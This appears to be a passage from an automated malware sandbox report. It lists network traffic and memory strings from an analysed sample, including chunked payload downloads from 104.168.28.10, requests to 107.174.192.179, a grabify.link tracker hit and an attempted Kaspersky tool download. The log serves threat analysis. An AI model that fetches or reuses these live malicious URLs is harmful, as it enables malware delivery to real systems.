                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=81920-98303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=65536-81919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=114688-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=131072-163839 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=163840-196607 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=196608-229375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=229376-262143 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=262144-294911 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=294912-327679 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=327680-360447 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=360448-393215 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=393216-458751 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=458752-524287 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=524288-589823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=589824-655359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=720896-786431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=786432-851967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=851968-917503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=917504-1048575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1048576-1179647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1179648-1310719 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1310720-1441791 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1441792-1572863 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1572864-1703935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1703936-1835007 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1835008-1966079 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1966080-2228223 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2228224-2490367 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2490368-2752511 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2752512-3014655 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3014656-3276799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3276800-3538943 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3538944-4063231 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4063232-4587519 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4587520-4849663 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4849664-5373951 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5373952-5606383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC34A0 recv,4_2_000001C3DDDC34A0
                    Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                    Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6IkY2WEtLTU1vWVhUSUp6VVdjTzkwd0E9PSIsInZhbHVlIjoia01wOWxMK2ZrTXh0RUoxZ1VJWjdPMGI5VkVMMm5MUlM3b2pRdmpnRlFSUDJCSnh4bUtnakx5dTBRVmZiMDdMZldEYVFvOXNPUWpZMnFUUU5zeEZDeEdtY1g2NFY3cmUvTnV0WVNrTzRESmd2VkJEZ24yVmc0b05USllyNjVmbkciLCJtYWMiOiI2ZGM4MjczNjczZDNlNThkNTI3NjI1YzM3ZTQwZGIxMjRjM2I0OGJkYjBjZDBlYTE1NjVkZTEzZDgwZDI1NWE2IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6ImZHMC9uUEtPdXFMaVRMTS9qN0ZEMnc9PSIsInZhbHVlIjoiMlFNaFhBcEYyMitWNmVXNlpFdEdKQVFvWnJPZXE0R1pCbnlFdC92dzJCaGVnQnMxdUo5ZWQ4Z1Ewd25DeUppaWNUWnJNOHRzalRpc3ZucWJUQjU0Z2dmWlBobUZqZnl1K3VvdGNkRFdNeW1wcTdhdUx4N3YySVBBSHI5WTRGWWYiLCJtYWMiOiJiYmQzM2IyMWI1ZGE0OWNhYTJkMGU4YjY2MzZmYmQ2YmRjZTViMGJjOTlkOGM1NDVjN2I1ZTcxMmJkMzMzNDQ2IiwidGFnIjoiIn0%3D
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficDNS traffic detected: DNS query: grabify.link
                    Source: global trafficDNS traffic detected: DNS query: devbuilds.s.kaspersky-labs.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:36 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd4751619b2ac5239ea; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:36 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:37 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd5751619b4ac488993; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:37 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:38 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd6751619a9ac41d052; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:38 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:39 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd7751619abac48f1e2; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:39 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:39 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd7751619adac52c0d5; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:39 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:40 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd8751619aeac4a2717; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:40 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:40 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd8751619b0ac440d3b; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:40 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:41 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd9751619b2ac524d21; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:41 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:41 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fd9751619b6ac4a7109; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:41 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 04 Apr 2025 06:44:42 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467ef7fda751619b8ac484563; domain=.kaspersky-labs.com; path=/; expires=Sat, 04-Apr-2026 06:44:42 GMT; HttpOnly
                    Source: tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1563941304.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1
                    Source: tzutil.exe, 00000008.00000003.1532766643.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531193943.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530597270.0000000002655000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531370230.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530721748.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532471628.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564778881.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530502238.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1527862180.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532619549.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1-
                    Source: tzutil.exe, 00000008.00000003.1532766643.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531193943.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530597270.0000000002655000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531370230.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530721748.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532471628.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564778881.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530502238.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1527862180.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532619549.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d11
                    Source: tzutil.exe, 00000008.00000002.1563941304.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1PCUSERD
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/clean
